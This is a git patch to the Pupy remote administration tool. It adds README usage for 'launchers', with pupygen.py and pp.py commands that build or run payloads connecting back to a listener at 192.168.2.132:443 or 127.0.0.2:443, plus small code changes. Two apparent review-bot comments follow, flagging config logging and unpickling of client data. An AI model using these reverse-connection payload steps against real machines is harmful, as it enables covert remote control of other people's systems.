From b24199df2c7d3c176d3f8e6fd9b274d5627ec06b Mon Sep 17 00:00:00 2001
From: n1nj4sec
Date: Mon, 23 Nov 2015 18:47:48 +0100
Subject: [PATCH] windows payloads now works with launchers

---
 README.md | 41 ++++++++++++++++++++++++--------------
 client/sources/main_exe.c | 3 ---
 pupy/pupygen.py | 2 ++
 pupy/pupylib/PupyServer.py | 3 ++-
 4 files changed, 30 insertions(+), 19 deletions(-)

diff --git a/README.md b/README.md
index 3f8b088d..0fa032af 100644
--- a/README.md
+++ b/README.md
@@ -29,6 +29,13 @@ Pupy is an opensource, multi-platform Remote Administration Tool with an embedde
 - scramblesuit - [A Polymorphic Network Protocol to Circumvent Censorship](http://www.cs.kau.se/philwint/scramblesuit/)
+## Implemented Launchers :
+Launchers allow pupy to run custom actions before starting the reverse connection
+- simple
+ - Just connect back
+- auto_proxy
+ - Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retriaval methods are : registry, WPAD requests, gnome settings, HTTP_PROXY env variable
+
 ## Implemented Modules :
 - migrate
 - inter process architecture injection also works (x86->x64 and x64->x86)
@@ -66,28 +73,32 @@ In these examples the server is running on a linux host (tested on kali linux) a
 The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)
 #### for Windows
 ```bash
-./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
+$ ./pupygen.py auto_proxy -h
+usage: auto_proxy [-h] --host
+ [--transport {obfs3,tcp_cleartext,tcp_ssl,tcp_base64,scramblesuit}]
+ ...
+$ ./pupygen.py -t exe_x86 auto_proxy --transport tcp_ssl --host 192.168.2.132:443
+binary generated with config :
+OUTPUT_PATH = ~/pupy/pupyx86.exe
+LAUNCHER = 'auto_proxy'
+LAUNCHER_ARGS = ['--transport', 'tcp_ssl', '--host', '192.168.2.132:443']
+OFFLINE_SCRIPT = None
+
+
 ```
 you can also :
+- use another launcher (currently simple or auto_proxy)
 - use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.
 - customize the transport used by supplying it with --transport
-#### for Linux
+#### for Linux & Mac OS X
 ```bash
 pip install rpyc #(or manually copy it if you are not admin)
-python pp.py 192.168.0.1:443
+python pp.py simple --transport tcp_ssl --host 127.0.0.2:443
 ```
-you can also build a single binary with pyinstaller :
-```bash
-pyinstaller --onefile /full_path/pupy/pupy/pp.py
-```
-
-#### for MAC OS X
-```bash
-easy_install rpyc #(or manually copy it if you are not admin)
-python pp.py 192.168.0.1:443
-```
-you can also build a single binary with pyinstaller (but you can't "cross-compile", pyinstaller currently only support this from osx):
+you can also :
+- modify the default arguments at the top of the file to call pp.py without arguments
+- build a single binary with pyinstaller :
 ```bash
 pyinstaller --onefile /full_path/pupy/pupy/pp.py
 ```
@@ -196,7 +207,7 @@ Some ideas without any priority order
 - [ ] split the README into the wiki
 - [ ] The backdoor factory ?
 - [ ] Impacket ?
-- [ ] support for https proxy
+- [X] support for https & socks proxy
 - [ ] HTTP transport
 - [ ] UDP transport
 - [ ] DNS transport
diff --git a/client/sources/main_exe.c b/client/sources/main_exe.c
index f5d797c3..970fbfcd 100644
--- a/client/sources/main_exe.c
+++ b/client/sources/main_exe.c
@@ -3,9 +3,6 @@
 #include
 #include
 #include "pupy_load.h"
-#ifndef DEBUG
- #pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup")
-#endif
 int main(int argc, char *argv[]){
 return mainThread(NULL);
diff --git a/pupy/pupygen.py b/pupy/pupygen.py
index fb97928a..999647db 100755
--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -3,6 +3,7 @@
 # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
 # Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
+import logging
 import argparse
 import sys
 import os.path
@@ -25,6 +26,7 @@ def get_edit_pupyx64_exe(conf):
 return get_edit_binary(os.path.join("payload_templates","pupyx64.exe"), conf)
 def get_edit_binary(path, conf):
+ logging.debug("generating binary %s with conf: %s"%(path, conf))
 if not "offline_script" in conf:
 offline_script=""
 else:
diff --git a/pupy/pupylib/PupyServer.py b/pupy/pupylib/PupyServer.py
index 176b2845..21c1178d 100644
--- a/pupy/pupylib/PupyServer.py
+++ b/pupy/pupylib/PupyServer.py
@@ -24,6 +24,7 @@ from .PupyErrors import PupyModuleExit, PupyModuleError
 from .PupyJob import PupyJob
 from .PupyCmd import color_real
 from network.conf import transports
+from pupylib.utils.rpyc_utils import obtain
 try:
 import ConfigParser as configparser
@@ -142,7 +143,7 @@ class PupyServer(threading.Thread):
 "pid" : l[7],
 "address" : conn._conn._config['connid'].split(':')[0],
 "launcher" : conn.get_infos("launcher"),
- "launcher_args" : conn.get_infos("launcher_args"),
+ "launcher_args" : obtain(conn.get_infos("launcher_args")),
 }, self))
 if self.handler:
 addr = conn.modules['pupy'].get_connect_back_host()
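Review bot: The new `logging.debug` line in get_edit_binary formats its message eagerly with `%`, so the conf mapping is stringified on every call even when debug output is disabled; the logging module's lazy form, `logging.debug("generating binary %s with conf: %s", path, conf)`, defers that work to the handler. That message also dumps the entire conf, which per the following lines includes the `offline_script` entry, so whatever script is embedded ends up in the log stream when debug is enabled — a short comment on the line saying that the full config is logged would help whoever later turns debug on. get_edit_binary's body continues beyond the hunk. In the first hunk of this file, `import logging` is inserted ahead of `argparse`, breaking the alphabetical order of the stdlib import block.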
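Review bot: `obtain(conn.get_infos("launcher_args"))` now copies a client-supplied value into the server process instead of leaving it behind a netref; if this `obtain` works like rpyc's classic one (pickle on the remote side, unpickle locally), the server is unpickling bytes the connecting client controls, which a line that merely fills an info dict should not do silently. If launcher_args is a list of strings, iterating the netref and converting each element keeps the copy by value without deserialising client data: `"launcher_args" : [str(a) for a in conn.get_infos("launcher_args")],`. The neighbouring `"launcher" : conn.get_infos("launcher")` is not passed through `obtain`, so the two fields are fetched inconsistently — presumably launcher is a plain string that rpyc already returns by value, but that is worth confirming. The enclosing method of PupyServer begins and ends outside the hunk.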